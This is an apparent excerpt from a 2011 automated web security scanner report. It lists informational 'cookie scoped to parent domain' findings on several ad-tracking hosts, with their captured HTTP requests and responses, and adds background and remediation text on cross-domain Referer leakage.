<body onload="sendToLogin()">
<form name="cipRedirect" method="post" action="https://easywebsoc.td.com/waw/idp/login.htm" target="_top">

           <br>
...[SNIP]...

7. Cookie scoped to parent domain  previous  next
There are 10 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


7.1. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=1034655852&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fwww.computerworld.com%252Fs%252Farticle%252F9220295%252FMySQL.com_hacked_to_serve_malware%253FtaxonomyId%253D17%26jsref%3D%26rnd%3D1317069532132&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fwww.computerworld.com%2Fs%2Farticle%2F9220295%2FMySQL.com_hacked_to_serve_malware%3FtaxonomyId%3D17&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.computerworld.com%2Fs%2Farticle%2F9220295%2FMySQL.com_hacked_to_serve_malware%3FtaxonomyId%3D17&jsref=&rnd=1317069532132
Cookie: UID=2695e1-80.67.74.150-1312230894

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 26 Sep 2011 20:38:37 GMT
Connection: close
Set-Cookie: UID=2695e1-80.67.74.150-1312230894; expires=Wed, 25-Sep-2013 20:38:37 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate


7.2. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=1&c2=7395021&c3=&c4=&c5=01&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Tue, 27 Sep 2011 13:21:40 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Thu, 26-Sep-2013 13:21:40 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate

GIF89a.............!.......,...........D..;

7.3. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035308&d.c=gif&d.o=computerworldcom&d.x=230482351&d.t=page&d.u=http%3A%2F%2Fwww.computerworld.com%2Fs%2Farticle%2F9220295%2FMySQL.com_hacked_to_serve_malware%3FtaxonomyId%3D17 HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.computerworld.com/s/article/9220295/MySQL.com_hacked_to_serve_malware?taxonomyId=17
Cookie: UID=2695e1-80.67.74.150-1312230894

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 26 Sep 2011 20:38:28 GMT
Connection: close
Set-Cookie: UID=2695e1-80.67.74.150-1312230894; expires=Wed, 25-Sep-2013 20:38:28 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate

GIF89a.............!.......,...........D..;

7.4. http://bid.openx.net/json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /json?c=OXM_79399726143&pid=9d40ff00-718e-d8e2-b18f-54978727399d&s=300x250&f=1.41&url=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F14%2Fnypost%2F300x250%2Frtb_tier1%3Ft%3D1317129678689%26tz%3D300%26m%3D0%26hu%3D%26ht%3Djs%26hp%3D0%26fo%3D%26url%3Dhttp%253A%252F%252Fwww.nypost.com%252F%26refer%3D&cid=oxpv1%3A34-632-1929-2158-6112&hrid=1cc78fdfdf489a12b2fcb8246e0a1cd8-1317129663 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6112&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=1316390688; i=d2a43928-76cd-49ea-b899-b41fb371435f

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: p=1317129667; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_79399726143({"r":"\u003cdiv style\u003d\"position: absolute; width: 0px; height: 0px; overflow: hidden\"\u003e\u003cimg src\u003d\"http://bid.openx.net/log?l\u003dH4sIAAAAAAAAAGXQMU7DMBgF4Be3Sd24U
...[SNIP]...

7.5. http://imp.fetchback.com/serve/fb/adtag.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/fb/adtag.js?clicktrack=http://ib.adnxs.com/click%3FVyeY6uHHCUA3iUFg5dAGQAAAAAAAAABAUrgehetRDEAAAAAAAAAQQO2gY7wFMt4mcEeI8W8QIlnDzYFOAAAAABshCABlAQAA2AMAAAIAAAClbggAPWQAAAEAAABVU0QAVVNEACwB-gDbTNsERRABAgUCAQQAAAAAMB3WDwAAAAA./cnd=!BwXkKQjykwgQpd0hGL3IASAA/referrer=http%253A%252F%252Fwww.nypost.com/clickenc=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLvQ0CMQwG0O_4U6Rbg9aSHRLZLliBHXJxUrMCk1FQX806iNe_FQuAa-tz5Fw7dRWhopXJg42KRItNS1euCYfHa_-sOP6HR-E5mUnFBoWNTJvYpFpcTbPe3CPhBOg94Yzl2xIuwPONHzTtG75zAAAA%2526dst%253D&tid=68326&type=mrect HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:21:10 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1317129670_1317129669033:1134794656352757; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 27 Sep 2011 13:21:10 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 730

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?clicktrack=http://ib.adnxs.com/click%3FVyeY6uHHCUA3iUFg5dAGQAAAAAAAAABAUrgehetRDEAAAAAAAAAQQO2gY7wFMt4mcEeI8W8QIlnDzYFOAAAAABshCAB
...[SNIP]...

7.6. http://imp.fetchback.com/serve/fb/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/imp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/imp?clicktrack=http://ib.adnxs.com/click%3FVyeY6uHHCUA3iUFg5dAGQAAAAAAAAABAUrgehetRDEAAAAAAAAAQQO2gY7wFMt4mcEeI8W8QIlnDzYFOAAAAABshCABlAQAA2AMAAAIAAAClbggAPWQAAAEAAABVU0QAVVNEACwB-gDbTNsERRABAgUCAQQAAAAAMB3WDwAAAAA./cnd=!BwXkKQjykwgQpd0hGL3IASAA/referrer=http%253A%252F%252Fwww.nypost.com/clickenc=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLvQ0CMQwG0O_4U6Rbg9aSHRLZLliBHXJxUrMCk1FQX806iNe_FQuAa-tz5Fw7dRWhopXJg42KRItNS1euCYfHa_-sOP6HR-E5mUnFBoWNTJvYpFpcTbPe3CPhBOg94Yzl2xIuwPONHzTtG75zAAAA%2526dst%253D&tid=68326&type=mrect HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:21:10 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cre=1_1317129670; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=1_1317129670_1317129669033:1134794656352757; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: kwd=1_1317129670; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: scg=1_1317129670; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ppd=1_1317129670; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: act=1_1317129670; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 27 Sep 2011 13:21:10 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2



7.7. http://tag.contextweb.com/TagPublish/GetAd.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=537740&ct=104419&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fwww.nydailynews.com%2Fgossip%2Findex.html&cwr=&mrnd=11911947&if=1&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/300x250/nydnros_atf?t=1317129766295&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Fgossip%2Findex.html&refer=http%3A%2F%2Fwww.nydailynews.com%2Fnews%2Fny_crime%2F2011%2F09%2F26%2F2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; cw=cw; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"; FC1-WCR=132981_1_3Ilow^132982_2_3Iloz; vf=3

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP207
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 8/301
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 3342
Vary: Accept-Encoding
Date: Tue, 27 Sep 2011 13:22:31 GMT
Connection: close
Set-Cookie: 537740_3_104419_-1=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: FC1-WC=59371_6_3IloC^59755_1_3IloF^58230_1_3KwfX^59372_1_3IloF^56557_1_3Ilpz; Domain=.contextweb.com; Expires=Fri, 27-Sep-2041 09:22:31 GMT; Path=/
Set-Cookie: FC1-PCC=6081_3HZ4N; Domain=.contextweb.com; Expires=Fri, 27-Sep-2041 09:22:31 GMT; Path=/
Set-Cookie: FC1-WCC=5995_1_3HZRb; Domain=.contextweb.com; Expires=Fri, 27-Sep-2041 09:22:31 GMT; Path=/
Set-Cookie: FC1-WCR=132981_3_3Ilow^132982_2_3Iloz; Domain=.contextweb.com; Expires=Fri, 27-Sep-2041 09:22:31 GMT; Path=/
Set-Cookie: vf=5; Domain=.contextweb.com; Expires=Wed, 28-Sep-2011 04:00:01 GMT; Path=/

document.write(decodeURIComponent("%3Cscript%20language%3D%27javascript%27%20type%3D%27text%2Fjavascript%27%20src%3D%27http%3A%2F%2Fimp.fetchback.com%2Fserve%2Ffb%2Fadtag.js%3Ftid%3D70289%26type%3Dmre
...[SNIP]...

7.8. http://tag.contextweb.com/TagPublish/GetAd.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=537740&ct=104418&cn=1&epid=&esid=&cf=160X600&rq=1&dw=160&cwu=http%3A%2F%2Fwww.nydailynews.com%2Fnews%2Fny_crime%2F2011%2F09%2F26%2F2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html&cwr=&mrnd=24548929&if=1&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/160x600/nydnros_btf?t=1317129699572&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Fnews%2Fny_crime%2F2011%2F09%2F26%2F2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html&refer=http%3A%2F%2Fwww.nydailynews.com%2Findex.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WCR=132982_1_3DL0Q; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2; cw=cw

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP207
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 8/301
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 3519
Vary: Accept-Encoding
Date: Tue, 27 Sep 2011 13:21:24 GMT
Connection: close
Set-Cookie: 537740_2_104418_-1=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: FC1-WCR=132980_2_3Ilow; Domain=.contextweb.com; Expires=Fri, 27-Sep-2041 09:21:23 GMT; Path=/
Set-Cookie: vf=2; Domain=.contextweb.com; Expires=Wed, 28-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Cscript%20language%3D%27javascript%27%20type%3D%27text%2Fjavascript%27%20src%3D%27http%3A%2F%2Fimp.fetchback.com%2Fserve%2Ffb%2Fadtag.js%3Ftid%3D70288%26type%3Dwid
...[SNIP]...

7.9. http://tag.contextweb.com/TagPublish/GetAd.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=537740&ct=104420&cn=1&epid=&esid=&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fwww.nydailynews.com%2Fgossip%2Findex.html&cwr=&mrnd=44712826&if=1&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1317129762831&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Fgossip%2Findex.html&refer=http%3A%2F%2Fwww.nydailynews.com%2Fnews%2Fny_crime%2F2011%2F09%2F26%2F2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; cw=cw; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2; FC1-WCR=132981_1_3Ilow^132982_1_3Iloz; vf=2; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP204
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 8/301
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 3340
Vary: Accept-Encoding
Date: Tue, 27 Sep 2011 13:22:28 GMT
Connection: close
Set-Cookie: 537740_4_104420_-1=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: FC1-WC=59371_6_3IloC^59755_1_3IloF^58230_1_3KwfX^59372_1_3IloF; Domain=.contextweb.com; Expires=Fri, 27-Sep-2041 09:22:27 GMT; Path=/
Set-Cookie: FC1-PCC=6081_3HZ4N; Domain=.contextweb.com; Expires=Fri, 27-Sep-2041 09:22:27 GMT; Path=/
Set-Cookie: FC1-WCC=5995_1_3HZRb; Domain=.contextweb.com; Expires=Fri, 27-Sep-2041 09:22:27 GMT; Path=/
Set-Cookie: FC1-WCR=132981_1_3Ilow^132982_3_3Iloz; Domain=.contextweb.com; Expires=Fri, 27-Sep-2041 09:22:27 GMT; Path=/
Set-Cookie: vf=4; Domain=.contextweb.com; Expires=Wed, 28-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Cscript%20language%3D%27javascript%27%20type%3D%27text%2Fjavascript%27%20src%3D%27http%3A%2F%2Fimp.fetchback.com%2Fserve%2Ffb%2Fadtag.js%3Ftid%3D70287%26type%3Dlea
...[SNIP]...

7.10. http://tag.contextweb.com/TagPublish/GetAd.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=537740&ct=104419&cn=1&epid=&esid=&cf=300X250&rq=1&dw=1241&cwu=http%3A%2F%2Fwww.nydailynews.com%2Fgossip%2Findex.html&cwr=http%3A%2F%2Fwww.nydailynews.com%2Fnews%2Fny_crime%2F2011%2F09%2F26%2F2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html&mrnd=94800823&if=0&tl=1&pxy=&cxy=1225,3244&dxy=1225,3244&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nydailynews.com/gossip/index.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; cw=cw; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"; FC1-WCR=132981_2_3Ilow^132982_2_3Iloz; vf=4

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP210
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 8/301
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 3343
Vary: Accept-Encoding
Date: Tue, 27 Sep 2011 13:22:31 GMT
Connection: close
Set-Cookie: 537740_3_104419_1=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: FC1-WCR=132981_3_3Ilow^132982_2_3Iloz; Domain=.contextweb.com; Expires=Fri, 27-Sep-2041 09:22:30 GMT; Path=/
Set-Cookie: vf=5; Domain=.contextweb.com; Expires=Wed, 28-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Cscript%20language%3D%27javascript%27%20type%3D%27text%2Fjavascript%27%20src%3D%27http%3A%2F%2Fimp.fetchback.com%2Fserve%2Ffb%2Fadtag.js%3Ftid%3D70289%26type%3Dmre
...[SNIP]...

8. Cross-domain Referer leakage  previous  next
There are 3 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


